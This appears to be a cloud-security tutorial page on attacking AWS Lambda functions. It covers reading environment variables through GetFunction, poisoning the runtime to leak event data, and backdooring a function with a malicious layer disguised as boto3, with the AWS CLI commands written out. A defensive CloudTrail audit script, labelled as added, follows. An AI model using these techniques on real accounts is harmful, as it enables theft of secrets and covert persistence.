Lambda - Security
Following are some interesting security scenarios:
If you have obtained keys that carry the "GetFunction" permission, you can view the Lambda's environment variables and even download the function's deployment package.
Permission needed: GetFunction
aws lambda get-function --function-name testDemo
The output will contain all the environment variables configured for the Lambda.
We have successfully compromised a Lambda that runs once every 10 minutes and want to leak all the events passed to it.
There are two ways to poison a Lambda:
- If the Lambda function imports any library, we can poison that library under /var/runtime, since libraries there are loaded by the Lambda every time the function is executed.
- If the main Lambda code has no imports, poison the bootstrap file at /var/runtime/bootstrap.py, since the init process loads this file every single time the Lambda is executed.
The simplest way to leak the event is to add a couple of lines such as:
http = urllib3.PoolManager()
The code above queries the Runtime API for the current event and passes its data to the attacker's server, thereby exfiltrating the event.
We have compromised a Lambda, have full access to the function, and now want to backdoor it. To do so, we can add a malicious layer to the function.
To create a layer, we first need to create a malicious file that the legitimate Lambda code will later reference. For instance, if the language is Python, we need to create a zip containing our malicious file. The zip's directory layout should be:
Zipping a layer
In the example above we created a malicious zip file that masquerades as boto3. We now create a new Lambda layer from that zip file:
aws lambda publish-layer-version --layer-name MyLayer --description "Backdoor layer" --license-info "MIT" --zip-file fileb:///layer.zip --compatible-runtimes python3.9 --compatible-architectures "x86_64" --region us-east-2
Once the layer is ready, we attach it to the target function:
aws lambda update-function-configuration --function-name securitylabs-lambda --layers arn:aws:lambda:us-east-2:123456789012:layer:MyLayer:1
Now, whenever the function is executed, our layer code is loaded and runs before the actual function code, thereby backdooring the function.
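As an added defender-side example (not part of the original page), the following Python audits CloudTrail records for the activity in the first and last scenarios: GetFunction reads that expose environment variables, new layer versions being published, and a layer outside an allowlist being attached to a function. The records, the allowlist and the CloudTrail field names are constructed assumptions for this example.

```python
# Constructed sample CloudTrail records (not real logs); the field names
# follow the Lambda API shape and are an assumption of this example.
SAMPLE_TRAIL = [
    {"eventName": "GetFunction20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/leaked-key"},
     "requestParameters": {"functionName": "testDemo"}},
    {"eventName": "PublishLayerVersion20181031",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/leaked-key"},
     "requestParameters": {"layerName": "MyLayer"}},
    {"eventName": "UpdateFunctionConfiguration20150331v2",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/leaked-key"},
     "requestParameters": {"functionName": "securitylabs-lambda",
                           "layers": ["arn:aws:lambda:us-east-2:123456789012:layer:approved-utils:2",
                                      "arn:aws:lambda:us-east-2:123456789012:layer:MyLayer:1"]}},
    {"eventName": "UpdateFunctionConfiguration20150331v2",  # benign: only timeout changed
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/deploy-pipeline"},
     "requestParameters": {"functionName": "securitylabs-lambda", "timeout": 30}},
]

# Layers each function is allowed to load (constructed allowlist).
APPROVED_LAYERS = {
    "securitylabs-lambda": {"arn:aws:lambda:us-east-2:123456789012:layer:approved-utils:2"},
}

def audit(records, approved=APPROVED_LAYERS):
    """Return (finding, principal, detail) tuples for records matching the scenarios:
    reading function code/env vars, publishing a layer, or attaching a non-allowlisted layer."""
    findings = []
    for rec in records:
        # CloudTrail suffixes Lambda event names with an API version date
        # (e.g. GetFunction20150331v2); strip it to get the bare API action.
        api = rec.get("eventName", "").rstrip("0123456789v")
        who = rec.get("userIdentity", {}).get("arn", "unknown")
        params = rec.get("requestParameters") or {}
        fn = params.get("functionName", "?")
        if api in ("GetFunction", "GetFunctionConfiguration"):  # both return the Environment block
            findings.append(("code-and-env-read", who, fn))
        elif api == "PublishLayerVersion":
            findings.append(("layer-published", who, params.get("layerName", "?")))
        elif api == "UpdateFunctionConfiguration" and "layers" in params:
            for arn in params["layers"]:
                if arn not in approved.get(fn, set()):
                    findings.append(("unapproved-layer-attached", who, f"{fn} <- {arn}"))
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_TRAIL):
        print(*finding)
```

Pair the allowlist with the function's actual configuration (aws lambda get-function-configuration) so that drift in the Layers list is caught even when the change did not pass through a logged API call you monitor.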